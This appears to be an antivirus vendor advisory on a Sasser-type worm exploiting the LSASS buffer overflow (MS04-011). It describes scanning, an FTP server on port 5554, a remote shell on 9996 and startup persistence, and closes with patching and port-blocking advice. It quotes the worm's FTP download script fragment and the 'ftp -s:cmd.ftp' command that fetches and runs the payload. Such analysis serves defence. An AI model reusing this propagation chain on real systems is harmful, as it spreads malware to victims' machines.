This 32-bit virus has a packed file size of 15,872 bytes and was coded using Visual C++. The only intention of this virus is to spread to other systems across the Internet, and quickly. This threat takes advantage of a vulnerability of a buffer overflow in Local Security Authority Subsystem Service (LSASS) [ref: MS04-011 and CAN-2003-0533].
The buffer overrun exists because of an unchecked buffer in the Local Security Authority Subsystem Service. This service is responsible for managing local security, domain authentication, and Active Directory processes. It handles authentication for the client and for the server. It also contains features that are used to support Active Directory utilities.
The virus will bind with TCP port 5554 and act as an
FTP server. The virus will then send SYN packets to
random IP addresses across the Internet to destination
TCP port 445. IP addresses which are live will respond
with an "ACK" packet. The virus will then
target that IP address by initiating its LSASS exploit
code in an effort to gain access to that system. If
the target can be compromised, the virus will write
into the IPC$ share an FTP script file which will request
the virus from the infected system. The virus is downloaded
from the infected system from TCP port 5554 to the target.
The file received will then be executed, and the cycle
Loading At Windows Startup
If this virus is run, it will copy itself to the Windows folder and register itself to run at each Windows startup -
"avserve.exe" = C:\WINNT\avserve.exe
While the virus is memory resident, it creates a Mutex reference named "Jobaka31".
Virus Delivery Through FTP
On an infected system, the virus may write files with random names, but a specific format into the System32 folder, such as these -
The virus will bind to TCP port 5554 and use this channel to operate an FTP emulation. The virus creates a file "c:\win.log" and writes the infected system IP address into this file. If the virus is able to compromise a target, it will open a remote shell on the target on TCP port 9996. Next the virus will write an FTP script file as "cmd.ftp" with the following instructions -
open undefinedIP Address
of infected systemundefined 5554
The virus remotely executes the FTP script using the
instruction "ftp -s:cmd.ftp". When the file
is retrieved to the target system, it is then executed
and the "cmd.ftp" script is then deleted.
- Check the main screen using the web interface for
your FortiGate unit to ensure that the latest AV/NIDS
database has been downloaded and installed on your
system - if required, enable the "Allow Push
- Using the FortiGate manager, block external to internal
traffic using UDP ports 135, 137, 138, and 445, and
TCP ports 135, 139, 445, 593, 5554 and 9996
- For Windows XP users, implement use of Personal
Firewall - this feature automatically blocks unsolicited
inbound traffic and would protect against this Internet
- Ensure affected systems are updated with the latest Microsoft security patches, and specifically the update which addresses this vulnerability in MS04-011